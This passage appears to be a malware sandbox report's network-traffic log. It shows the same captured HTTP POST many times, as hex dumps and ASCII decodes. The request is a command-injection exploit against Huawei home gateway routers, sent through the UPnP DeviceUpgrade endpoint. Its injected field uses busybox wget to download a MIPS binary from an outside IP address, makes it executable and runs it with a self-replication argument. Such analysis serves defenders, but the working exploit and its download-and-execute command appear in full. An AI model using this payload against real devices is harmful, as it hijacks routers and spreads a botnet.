69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 3b 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 73 65 6c 66 72 65 70 2e 62 75 6c 75 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 483Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 